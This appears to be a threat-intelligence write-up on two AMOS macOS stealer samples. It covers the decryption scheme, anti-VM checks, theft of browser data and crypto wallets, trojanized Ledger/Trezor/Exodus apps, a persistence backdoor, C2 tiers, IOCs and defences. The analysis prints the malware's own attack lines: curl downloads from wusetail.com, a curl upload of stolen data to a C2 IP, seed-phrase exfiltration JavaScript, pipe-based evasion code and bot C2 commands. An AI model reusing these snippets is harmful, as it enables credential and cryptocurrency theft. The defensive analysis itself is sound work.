AMOS Stealer v3: Fully Decrypted -- Triple S-Box Encryption, Wallet Replacement Attacks, and a Three-Tier C2 Infrastructure
--- --- Two macOS malware samples uploaded to MalwareBazaar by researcher **smica83** (Szabolcs Schmidt, Threat Intel Specialist) were analyzed. Both
AMOS Stealer v3: Fully Decrypted -- Triple S-Box Encryption, Wallet Replacement Attacks, and a Three-Tier C2 Infrastructure
TL;DR: Two new AMOS (Atomic macOS Stealer) samples uploaded to MalwareBazaar reveal a significant evolution of the macOS stealer family. FGBOT fully decrypted the multi-layer encryption (SplitMix64 PRNG, triple S-box substitution, triplet encoding), live-downloaded and analyzed four second-stage payloads including trojanized Ledger/Trezor/Exodus wallet apps that phish BIP39 seed phrases, and mapped a three-tier C2 infrastructure spanning bulletproof hosting, offshore VPS, and Cloudflare-proxied domains -- all confirmed active and collecting stolen data as of March 4, 2026.
The Big Picture: From Infostealer to Crypto Supply Chain Attack
This campaign is not just credential theft. The AMOS operator has bolted a full cryptocurrency supply chain attack onto the stealer framework: after harvesting passwords, browser data, and wallet files, the malware silently replaces legitimate Ledger, Trezor, and Exodus desktop applications with trojanized clones that phish 24-word BIP39 recovery phrases. Stolen seed phrases are exfiltrated to a dedicated Cloudflare-fronted server (systellis.com) that was live and actively receiving data at the time of analysis. A persistent backdoor (kito) maintains long-term access via a separate C2 at 45.94.47.204, ensuring the operator retains control even if the stealer C2 is taken down.
These samples share identical infrastructure with the AMOS v1 variants we analyzed from the OpenClaw campaign two days prior -- same primary C2 IP (38.244.158.103), same backup domain (avipstudios.com), same bulletproof hosting provider (3NT Solutions). The encryption, however, has been substantially upgraded. The threat actor behind this -- tracked by CrowdStrike as COOKIE SPIDER -- is iterating rapidly.
Sample Overview
| Property | kakkaa_puolaan (Stage 1) | helper (Stage 2) |
|---|---|---|
| SHA-256 | 65336d043397311f7995ff147fdc769bd8f6ac49ad8d09b4e716adeff560ec5c | 6f0e8713ff4143f107aa610252aff265035220c2b10ce2023c942d9df7565bef |
| MD5 | 23f19858146c3e8bcbed70d5e4851f4c | 242341a776aea09b128fd306b3a63d3a |
| Size | 3,242,424 bytes (3.1 MB) | 4,328,440 bytes (4.3 MB) |
| Format | Mach-O FAT (x86_64 + arm64) | Mach-O FAT (x86_64 + arm64) |
| Detection | Kaspersky: HEUR:Trojan-PSW.OSX.Amos.bk | ClamAV: MacOS.AMOS-CZ |
| Shell | /bin/sh -s (piped stdin) | /bin/zsh -c (command arg) |
| Role | Dropper/loader with anti-VM gating | Full stealer + persistence |
| Reporter | smica83 (Szabolcs Schmidt) | smica83 |
Both are Universal FAT Mach-O binaries. 98-99% of each binary is encrypted payload stored in __TEXT.__const. The actual machine code in __TEXT.__text is only 7-10 KB. The import table is minimal -- only libc++.1.dylib and libSystem.B.dylib -- because all stealing functionality is delegated to decrypted AppleScript and shell commands at runtime.
Encryption Architecture: Four Layers Deep
The encryption has been substantially upgraded from AMOS v1. Each layer must be peeled in sequence.
Layer 1: Custom Base64 with Per-Build Randomized Alphabets
Each build uses a unique 64-character alphabet generated at runtime from 5 lookup tables embedded in __const. The alphabets recovered from these samples:
kakkaa: F6zElu1TgB(Y&J+*)Hkr<7$=_qUOo-Q>2vA?Z%Kt0@sdVGRPe4m9pLiIS8#aWMCj
helper: Em!WgB=0GLyMAXzZ(a1PeRohlcqUrNbTYfn>j4HC9K2I5@k$OQD-Ji8+?pS_67<3
The alphabet generation function iterates 128 times over the lookup tables, applying ROTR8(tableA[i] - tableB[i], tableC[i] & 7) XOR tableD[i] - tableE[i] to produce 128 hex digits that decode to the 64-character alphabet. Because the lookup tables differ per build, signature-based detection on the alphabet is ineffective.
Layer 2: Hex Encoding
Base64-decoded bytes are hex-encoded, producing a 2x size expansion. This is a straightforward obfuscation layer that complicates pattern matching on the intermediate representation.
Layer 3: S-Box Substitution with Rolling XOR
A 256-byte bijective permutation table (S-box) is applied with a rolling XOR cipher:
key = initial_key # 0xFF for kakkaa, 0x05 for helper
for i, byte in enumerate(data):
substituted = sbox[byte ^ key]
key = ((key ^ substituted) + i) & 0xFF
output.append(substituted)
The kakkaa sample uses three independent S-boxes (768 bytes total), a significant increase in complexity over v1's single S-box. All S-boxes are perfect 256-byte permutations with unique values -- they are regenerated per build by the AMOS builder, making S-box-value-based YARA rules useless.
Layer 4: Triplet Encoding (12x Size Expansion)
Each output byte is encoded as three uint32 values (12 bytes per character), producing a 12x size expansion. Two decoding formulas were identified:
Primary: byte = ((val2 * 3) XOR val1) >> shift - val2
Dual-table: byte = (val1 >> 16) XOR (val1 - val2) & 0xFF
A golden ratio constant (0x9E3779B1) is used for rolling integrity hashing, enabling tamper detection on the encoded data before decryption proceeds.
kakkaa-Specific: SplitMix64 PRNG Keystream
The kakkaa dropper adds a fifth layer: a SplitMix64-style PRNG (constant 0x59542DB0CCF620CB) generates the decryption keystream. The PRNG is seeded with ASLR-dependent entropy -- XOR of the stack address, the _exit function pointer, and a hardcoded constant (0x6748BC23BC17CD73). This makes static decryption infeasible without reimplementing the full PRNG state machine or executing the binary.
The PRNG state evolves through a 4-way switch table based on state & 3:
Case 0: add + shr >> 3 + XOR
Case 1: add + sub + movzx + XOR
Case 2: shrd rotation by 37 + shr >> 5 + XOR
Case 3: default mixing path
This is the most sophisticated encryption we have observed in the AMOS family to date.
Execution Flow: Pipe-Based Evasion
The kakkaa dropper introduces a significant evasion upgrade over previous AMOS versions. Rather than passing the decrypted payload as a command-line argument (visible in ps output), it streams the payload through a pipe to /bin/sh stdin:
pipe(fd);
pid = fork();
if (pid == 0) {
// Child: redirect stdin to pipe read end
dup2(fd[0], STDIN_FILENO);
close(fd[0]); close(fd[1]);
execl("/bin/sh", "sh", "-s", NULL); // read commands from stdin
} else {
// Parent: write decrypted payload in 64-byte chunks
close(fd[0]);
for (offset = 0; offset < payload_len; offset += 64) {
write(fd[1], payload + offset, min(64, remaining));
usleep(delay);
}
close(fd[1]);
waitpid(pid, &status, 0);
}
Process monitoring tools would only see /bin/sh -s -- the 65 KB decrypted AppleScript payload never appears in the process argument list. EDR rules that rely on command-line inspection will miss this entirely.
The helper stage reverts to the simpler fork() + execvp("/bin/zsh", ["-c", payload]) pattern. This suggests the AMOS builder now supports multiple delivery profiles optimized for different stages of the attack chain.
Anti-VM Checks
Both samples execute identical anti-VM gating before proceeding to payload execution. The check is decrypted and run via osascript:
set memData to do shell script "system_profiler SPMemoryDataType"
set hardwareData to do shell script "system_profiler SPHardwareDataType"
if memData contains "QEMU" or memData contains "VMware" or memData contains "KVM" or
hardwareData contains "Z31FHXYQ0J" or hardwareData contains "C07T508TG1J2" or
hardwareData contains "C02TM2ZBHX87" or hardwareData contains "Chip: Unknown" or
hardwareData contains "Intel Core 2" then
set exitCode to 100
else
set exitCode to 0
end if
Exit code 100 causes the malware to abort. Exit code 0 proceeds to payload execution. The VM serial numbers (Z31FHXYQ0J, C07T508TG1J2, C02TM2ZBHX87) are known sandbox indicators. This anti-VM capability is new in v3 -- the v1 OpenClaw samples had no such checks.
Stealer Capabilities (Fully Decrypted)
The helper stage 2 payload was fully decrypted: a 65,018-byte AppleScript with 275 obfuscated string fragments using numeric array encoding with random offsets.
Credential Harvesting
The stealer displays a fake system dialog to phish the user's macOS password:
"Required Application Helper. Please enter device password to continue." Title: "Application wants to install helper"
The password is validated via dscl . authonly <username> <password>. On success, the keychain (~/Library/Keychains/login.keychain-db) and Chrome Safe Storage password (security find-generic-password -ga "Chrome") are stolen.
Browser Data Theft
12 Chromium-based browsers targeted, stealing cookies, login data, web data (autofill/credit cards), history, extension settings, local storage, and IndexedDB per browser:
| Browser | Path |
|---|---|
| Google Chrome | Google/Chrome/ |
| Chrome Beta/Canary/Dev | Google/Chrome Beta/, Canary, Dev/ |
| Chromium | Chromium/ |
| Brave | BraveSoftware/Brave-Browser/ |
| Microsoft Edge | Microsoft Edge/ |
| Vivaldi | Vivaldi/ |
| Opera / Opera GX | com.operasoftware.Opera/, OperaGX/ |
| Arc | Arc/User Data/ |
| CocCoc | CocCoc/Browser/ |
2 Firefox-based browsers (Firefox, Waterfox): cookies.sqlite, key4.db, logins.json, formhistory.sqlite, places.sqlite, plus MetaMask extension data.
Safari: Cookies.binarycookies from multiple container paths.
Cryptocurrency Wallet Theft
264 browser extension IDs are targeted, covering MetaMask, Phantom, TronLink, Coinbase Wallet, Trust Wallet, OKX Wallet, Rabby, Keplr, Argent X, SafePal, and hundreds more.
18 desktop wallet applications are raided:
| Wallet | Target Path |
|---|---|
| Electrum / Electrum LTC / Electron Cash | ~/.electrum/wallets/, etc. |
| Exodus | Exodus/ |
| Atomic Wallet | atomic/Local Storage/leveldb/ |
| Ledger Live | Ledger Live/ |
| Trezor Suite | @trezor/suite-desktop/ |
| Bitcoin/Litecoin/Dash/Dogecoin Core | Bitcoin/wallets/, etc. |
| Monero | /Monero/wallets/ |
| Coinomi / Guarda / Wasabi / Sparrow | Various paths |
| TonKeeper | @tonkeeper/desktop/config.json |
| Binance | Binance/app-store.json |
Wallet Replacement Attack (New in v3)
After stealing wallet data, the malware downloads trojanized wallet apps from wusetail.com and replaces legitimate installations:
# Example: Ledger Wallet replacement
curl https://wusetail.com/zxc/app.zip -o /tmp/app.zip
pkill "Ledger Wallet"
sudo -S rm -r "/Applications/Ledger Wallet.app"
ditto -x -k /tmp/app.zip /Applications
chmod -R +x "/Applications/Ledger Wallet.app"
The same process is applied to Trezor Suite (apptwo.zip) and Exodus (appex.zip).
Trojanized Wallet Analysis
All three trojanized wallets were live-downloaded and analyzed:
| Property | Fake Ledger | Fake Trezor | Fake Exodus |
|---|---|---|---|
| SHA-256 | 1f53767cebbaa534... | 666644322c3cd19d... | a843b479ed34514f... |
| Bundle ID | com.led.mas | com.app.moso | test.exodus-web-app |
| Framework | Swift + SwiftUI + WKWebView | Same | Same |
| Build | Xcode 2620, macOS SDK 26.2 | Same | Same |
| Exfil URL | systellis.com/receive.php | systellis.com/receivet.php | systellis.com/receiveex.php |
| Languages | EN, FR, DE, ES, IT | Same | Same |
Each app is a native macOS application using WKWebView to load bundled phishing HTML. A WKScriptMessageHandler bridges JavaScript to Swift. The social engineering lure is multi-language: "Suspicious activity was detected on your device" -- followed by a prompt for the 24-word BIP39 recovery phrase.
The exfiltration protocol uses double-base64 encoding:
const encodedUsername = btoa(username);
const encodedSeed = btoa(seedPhrase);
const securedData = { username: encodedUsername, seed: encodedSeed };
const encodedSecuredHeader = btoa(JSON.stringify(securedData));
fetch("https://systellis.com/receive.php", {
method: "POST",
headers: {
"Content-Type": "application/json",
"Secured": encodedSecuredHeader // double-base64 exfil header
},
body: JSON.stringify({ username: encodedUsername, seed: encodedSeed })
});
systellis.com was registered on 2026-02-24, uses Cloudflare nameservers, and was confirmed active -- all three /receive*.php endpoints return 405 on GET (POST-only), with CORS headers exposing the Secured custom header. This server is actively collecting stolen seed phrases.
Persistence Mechanism
The stealer installs a LaunchDaemon using the phished password for sudo access:
<!-- /Library/LaunchDaemons/com.finder.helper.plist -->
<plist version="1.0">
<dict>
<key>Label</key><string>com.finder.helper</string>
<key>ProgramArguments</key>
<array><string>/bin/bash</string><string>/.agent</string></array>
<key>RunAtLoad</key><true/>
<key>KeepAlive</key><true/>
</dict>
</plist>
The /.agent script downloads a persistence binary:
curl -o /.mainhelper https://wusetail.com/zxc/kito
chmod +x /.mainhelper
A loop then runs /.mainhelper as the logged-in console user via osascript, ensuring it survives logouts and reboots.
Persistence Backdoor: kito (Fully Decrypted)
The kito binary (SHA-256: 5c801591a075d654ce96f14651a82af80bbe16dbe50e9400b567834e6259691a) was fully decrypted -- all 13 encrypted states resolved. It uses the same AMOS encryption engine with multiple variants (5-table rotation, dual-table, triplet, S-box+XOR).
Decrypted State Map
| State | Content | Purpose |
|---|---|---|
| 0 | Custom base64 alphabet (64 chars) | Decryption bootstrap |
| 1 | Anti-VM script (536 bytes) | VM gating |
| 2 | /tmp/.botlock | Single-instance lock file |
| 4 | /.id | Bot identity file path |
| 5 | /.mainhelper | Self binary path |
| 6 | curl -s -X POST http://45.94.47.204/api/join/ -d ' | Bot registration |
| 7 | curl -s 'http://45.94.47.204/api/tasks/ | Command polling |
| 8 | delete | Self-destruct command |
| 9 | repeat; | Re-execute command |
| 10 | execute; | Run arbitrary shell command |
| 11 | pong | Heartbeat response |
| 12 | rm -f | Self-delete prefix |
Bot Protocol
- Check for VM -- abort if detected
- Create lock file
/tmp/.botlock(prevent multiple instances) - Read or generate bot ID at
/.id - Register with C2:
POST http://45.94.47.204/api/join/ - Poll for tasks:
GET http://45.94.47.204/api/tasks/<bot_id> - Execute received commands (
execute;), repeat previous (repeat;), or self-delete (deletetriggersrm -f /.mainhelper)
This gives the AMOS operator persistent remote code execution on compromised machines, independent of the initial stealer exfiltration.
C2 Infrastructure: Three-Tier Architecture
The campaign uses three separate C2 tiers, each serving a distinct function:
Tier 1: Stealer Exfiltration -- 38.244.158.103
| Property | Value |
|---|---|
| Endpoint | http://38.244.158.103/contact |
| ASN | AS58061 (Scalaxy B.V., Latvia) |
| Hosting | 3NT SOLUTIONS LLP (UK LLP, OC363382) |
| Physical Location | Ketelskamp 10, Meppel, Netherlands |
| Block | 38.244.158.0/24 (CLOUD-NETWORK-NL) |
3NT Solutions is a documented bulletproof hosting provider tracked by security researchers since 2014. Designated members are shell companies registered in Belize (DARL IMPEX LTD, LEGRANT TRADING LTD). The same /24 subnet hosts 38.244.158.56, a confirmed AMOS "malext" variant C2 documented by researcher fab0 -- indicating a dedicated AMOS C2 cluster.
Stolen data is exfiltrated as a ZIP archive via HTTP POST with custom headers:
curl --connect-timeout 120 --max-time 300 -X POST \
-H "user: <username>" -H "BuildID: <build_id>" \
-H "cl: <client_info>" -H "cn: <computer_name>" \
-F "file=@/tmp/out.zip" \
http://38.244.158.103/contact
Backup C2: https://avipstudios.com/contact -- a hijacked expired domain (legitimate since 2019, re-registered 2026-02-23) proxied through Cloudflare, with the origin server confirmed as 38.244.158.103 via identical CSP headers.
Tier 2: Persistent Backdoor C2 -- 45.94.47.204
| Property | Value |
|---|---|
| Endpoint | http://45.94.47.204/api/ |
| ASN | AS207461 |
| Hosting | rapidseedbox.com |
| Registration | Global Gateway 8, Providence, Mahe, Seychelles |
Different physical server than the stealer C2 (different SSH fingerprints) but identical C2 panel software (matching CSP headers). The API endpoint at /api/tasks/ returns 400 Bad Request, confirming it is active and expecting parameters.
Tier 3: Seed Phrase Exfiltration -- systellis.com
| Property | Value |
|---|---|
| Endpoints | /receive.php, /receivet.php, /receiveex.php |
| Registrar | Hello Internet Corp (hello.co) |
| Created | 2026-02-24 |
| CDN | Cloudflare (104.21.39.165, 172.67.146.196) |
| Status | LIVE -- actively collecting seed phrases |
This three-tier separation provides operational resilience. Takedown of one C2 does not affect the others.
Domain Rotation and Expired Domain Hijacking
All campaign domains were registered through Hello Internet Corp (IANA ID 1924):
| Domain | Created | Role | Status |
|---|---|---|---|
avipstudios.com | 2026-02-23 | Backup C2 | Active |
systellis.com | 2026-02-24 | Seed phrase exfil | Active |
wusetail.com | 2026-03-02 | Payload distribution | Active |
malext.com | 2026-02-02 | Earlier C2 | Unknown |
raytherrien.com | 2026-02-12 | Payload delivery | Unknown |
Both avipstudios.com and wusetail.com are hijacked expired domains with years of legitimate history. avipstudios.com was associated with a video production company (Richard Langsmith / Digital Reality Inc) since 2019. wusetail.com was a restaurant loyalty SaaS platform (2023-2025) serving clients including Slim Chickens and Noodles & Company. The AMOS operator deliberately acquires expired domains with long histories to inherit residual domain reputation and bypass URL filtering -- a documented TTP for this threat actor.
The registrar rotation pattern also shifted over time: WebNic.cc (2025) to Mat Bao Corp, Vietnam (mid-2025) to Hello Internet Corp (2026), reducing the risk of simultaneous domain seizure.
MITRE ATT&CK Mapping
| Technique | ID | Implementation |
|---|---|---|
| AppleScript Execution | T1059.002 | Payload executed via osascript |
| Unix Shell | T1059.004 | Commands via /bin/sh -s and /bin/zsh -c |
| GUI Input Capture | T1056.002 | Fake password dialog |
| Input Capture: Web Portal | T1056.003 | Fake wallet seed phrase forms |
| Keychain | T1555.001 | login.keychain-db theft |
| Browser Credentials | T1555.003 | Chrome/Firefox password databases |
| Steal Web Session Cookies | T1539 | Browser cookie databases |
| Data from Local System | T1005 | File grabber, wallet files, Apple Notes |
| Archive Collected Data | T1560.002 | ditto/zip compression |
| Exfiltration Over C2 | T1041 | HTTP POST to C2 with ZIP archive |
| Boot/Logon Autostart: Plist | T1547.011 | LaunchDaemon com.finder.helper |
| Supply Chain Compromise | T1195.002 | Trojanized Ledger/Trezor/Exodus apps |
| Virtualization/Sandbox Evasion | T1497.001 | system_profiler VM checks |
| Deobfuscate/Decode | T1140 | Multi-layer decryption engine |
| Obfuscated Files | T1027 | Encrypted payloads, numeric string encoding |
| Masquerading | T1036 | com.finder.helper mimics Finder |
| Acquire Infrastructure: Domains | T1583.001 | Expired domain hijacking |
| Multi-Stage Channels | T1104 | Split C2 across 3 tiers |
| Application Layer Protocol | T1071.001 | HTTP-based bot C2 (join/tasks API) |
| Remote Access Software | T1219 | kito backdoor with execute/delete/heartbeat |
Evolution from AMOS v1
| Feature | AMOS v1 (OpenClaw, Mar 2) | AMOS v3 (This Campaign, Mar 4) |
|---|---|---|
| C2 IP | 38.244.158.103 | Same |
| Binary format | Single-arch Mach-O | Universal FAT (x86_64 + arm64) |
| S-box layers | 1 | 3 (kakkaa), 1 (helper) |
| Encryption | Rolling XOR (key 0x5C) | SplitMix64 PRNG + multi-pass |
| Anti-VM | None | system_profiler checks |
| Wallet replacement | None | Ledger, Trezor, Exodus |
| Pipe execution | No | Yes (kakkaa -- stdin streaming) |
| Persistent backdoor | No | Yes (kito via LaunchDaemon) |
| Seed phrase phishing | No | Yes (trojanized wallet apps) |
| Size (v1 fat to helper) | 578 KB | 4,227 KB (7.5x growth) |
The code size in __text remains nearly identical (7-10 KB) across all versions -- the hallmark of a shared builder framework. The growth is entirely in encrypted payload and encoding overhead.
Indicators of Compromise
Network Indicators
| Type | Indicator | Context |
|---|---|---|
| IP | 38.244.158.103 | Primary C2 -- stealer exfil (3NT Solutions, AS58061) |
| IP | 38.244.158.56 | Related AMOS "malext" C2 in same /24 |
| IP | 45.94.47.204 | Backdoor C2 -- bot registration/tasking (AS207461) |
| Domain | avipstudios.com | Backup C2 (Cloudflare-proxied) |
| Domain | wusetail.com | Payload distribution server |
| Domain | systellis.com | Seed phrase exfiltration |
| Domain | malext.com | Earlier AMOS C2 |
| Domain | raytherrien.com | Earlier payload delivery |
| URL | http://38.244.158.103/contact | Stealer data exfil endpoint |
| URL | http://45.94.47.204/api/join/ | Bot registration |
| URL | http://45.94.47.204/api/tasks/ | Bot command polling |
| URL | https://systellis.com/receive.php | Ledger seed exfil |
| URL | https://systellis.com/receivet.php | Trezor seed exfil |
| URL | https://systellis.com/receiveex.php | Exodus seed exfil |
| URL | https://wusetail.com/zxc/app.zip | Trojanized Ledger |
| URL | https://wusetail.com/zxc/apptwo.zip | Trojanized Trezor |
| URL | https://wusetail.com/zxc/appex.zip | Trojanized Exodus |
| URL | https://wusetail.com/zxc/kito | Persistence binary |
| CIDR | 38.244.158.0/24 | Recommended block (AMOS C2 cluster) |
| CIDR | 45.94.47.0/24 | Recommended block (backdoor C2 subnet) |
File Indicators
| Type | Hash | Description |
|---|---|---|
| SHA-256 | 65336d043397311f7995ff147fdc769bd8f6ac49ad8d09b4e716adeff560ec5c | kakkaa_puolaan (Stage 1 dropper) |
| SHA-256 | 6f0e8713ff4143f107aa610252aff265035220c2b10ce2023c942d9df7565bef | helper (Stage 2 stealer) |
| SHA-256 | 16c26d16c7dd983c2229725b9d7be5b1684c99088e3b2d87a3beef23475b1133 | app.zip (trojanized Ledger) |
| SHA-256 | f4ad4a62213f5c6a7f0ad6cd9ce0ad1ecdb3913bfdc35823556fe569ba4c6523 | apptwo.zip (trojanized Trezor) |
| SHA-256 | 2f1ce625f10b37520917fbc76704af55799f1f0120725832778236792c44bf55 | appex.zip (trojanized Exodus) |
| SHA-256 | 5c801591a075d654ce96f14651a82af80bbe16dbe50e9400b567834e6259691a | kito (persistence backdoor) |
| SHA-256 | 1f53767cebbaa534fdcdfa40710a79dd7e6dd9c40bf0a02d759957da34c25275 | Trojanized Ledger binary |
| SHA-256 | 666644322c3cd19dd06b5e0a4484178b3e3a9b7c40cf8494971798d08c0133be | Trojanized Trezor binary |
| SHA-256 | a843b479ed34514f9bedc0d8b5256c79706e3305cecd37e38873411c815dde30 | Trojanized Exodus binary |
Host Indicators
| Path | Purpose |
|---|---|
/Library/LaunchDaemons/com.finder.helper.plist | Persistence LaunchDaemon |
/.agent | Bash wrapper for persistence loop |
/.mainhelper | Downloaded backdoor binary |
/.id | Bot identity file |
/.logged | Tracking file |
/.pass | Stolen password cache |
/.username | Stolen username cache |
/tmp/.botlock | Bot single-instance lock |
/tmp/out.zip | Exfiltration archive |
Binary Signatures (YARA-Compatible)
# Magic header at __const+0 (shared across all AMOS variants)
5F 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
# SplitMix64 constant (kakkaa)
CB 20 F6 CC B0 2D 54 59
# Entry XOR seed (kakkaa)
73 CD 17 BC 23 BC 48 67
# Golden ratio constant
B1 79 37 9E
# Build IDs
xFsGFKxHG2Bb6HUsGs4wSMqw/K7GC1rlhPrmG0FaOvE=
yv0MUSz6SfuafDSpJehiSeIKtKFx2Y1q1wCEVkdV1lQ=
# Trojanized wallet Bundle IDs
com.led.mas
com.app.moso
test.exodus-web-app
Defensive Recommendations
Immediate Actions
- Block all network IOCs at the perimeter -- IPs, domains, and URLs listed above. Consider blocking the entire
38.244.158.0/24and45.94.47.0/24subnets. - Hunt for persistence artifacts:
com.finder.helperLaunchDaemon,/.agent,/.mainhelper,/.id,/tmp/.botlock. - Verify wallet application integrity: Check bundle IDs of installed Ledger, Trezor, and Exodus apps. Legitimate bundle IDs will not be
com.led.mas,com.app.moso, ortest.exodus-web-app. - Alert on
system_profilerexecution followed byosascriptwithin a short timeframe -- this is the anti-VM check sequence. - Monitor for HTTP POST to bare IP addresses on port 80 with
/contactpath and custom headers (BuildID,cl,cn).
Detection Engineering
- YARA rule: Detect the
0x5Fheader marker + SplitMix64 constant (0x59542DB0CCF620CB) in Mach-O__TEXT.__constsections. - EDR query for pipe-based execution:
pipe()+fork()+dup2()+execl("/bin/sh", "-s")sequence -- the new evasion pattern inkakkaa. - Sigma rule: HTTP POST to
/contactwithBuildIDheader and multipart form data containing a ZIP attachment. - Suricata/Snort: Alert on HTTP POST to
/api/join/or/api/tasks/on port 80 to any IP in the45.94.47.0/24range. - File integrity monitoring: Any writes to the filesystem root (
/.agent,/.mainhelper,/.id) or/Library/LaunchDaemons/com.finder.helper.plist.
Takedown Priorities
- PRIORITY: Report
systellis.comto Cloudflare Trust & Safety -- this server is actively receiving stolen BIP39 seed phrases, meaning cryptocurrency theft is ongoing. - Report
wusetail.comandavipstudios.comto registrar Hello Internet Corp (abuse@hello.co). - Report stealer C2
38.244.158.103to abuse@3nt.com and upstream carrier Cogent (abuse@cogentco.com). Note: 3NT Solutions is unlikely to act -- they are a documented bulletproof host. - Report backdoor C2
45.94.47.204to ip@rapidseedbox.com. - Request Let's Encrypt certificate revocation for
systellis.com,wusetail.com, andavipstudios.com.
Conclusion
This investigation demonstrates that AMOS Stealer is evolving rapidly. In two days (March 2 to March 4, 2026), the operator upgraded from single-arch binaries with rolling XOR encryption to Universal FAT binaries with SplitMix64 PRNG keystreams, triple S-box substitution, anti-VM gating, and a pipe-based execution method that evades command-line monitoring. More significantly, the campaign now includes a cryptocurrency supply chain attack -- replacing legitimate wallet applications with trojanized clones that phish seed phrases -- and a persistent backdoor that maintains long-term remote code execution independent of the stealer C2.
The three-tier C2 architecture (bulletproof hosting for stealer exfil, offshore VPS for backdoor C2, Cloudflare-fronted domains for seed phrase collection) shows operational maturity. The expired domain hijacking technique, registrar rotation, and /zxc/ path convention are consistent with documented COOKIE SPIDER TTPs. The operator is running a professional MaaS operation, and the infrastructure analyzed here is likely serving multiple AMOS customers simultaneously.
All four payload servers (wusetail.com/zxc/*) were live and serving malware at the time of analysis. The kito backdoor binary was updated the same day we downloaded it. The systellis.com seed phrase collection endpoints were active. This is an ongoing operation.
Defenders should prioritize blocking the IOCs listed above, hunting for the persistence artifacts on macOS endpoints, and validating the integrity of any installed cryptocurrency wallet applications. The pipe-based execution evasion in kakkaa warrants updating EDR detection rules that rely solely on process command-line inspection.
Published 2026-03-08 | FGBOT Autonomous Threat Hunting | Breakglass Intelligence Investigation ID: kakkaa-investigation | Samples sourced from MalwareBazaar (reporter: smica83) IOCs are provided for defensive use. Handle responsibly.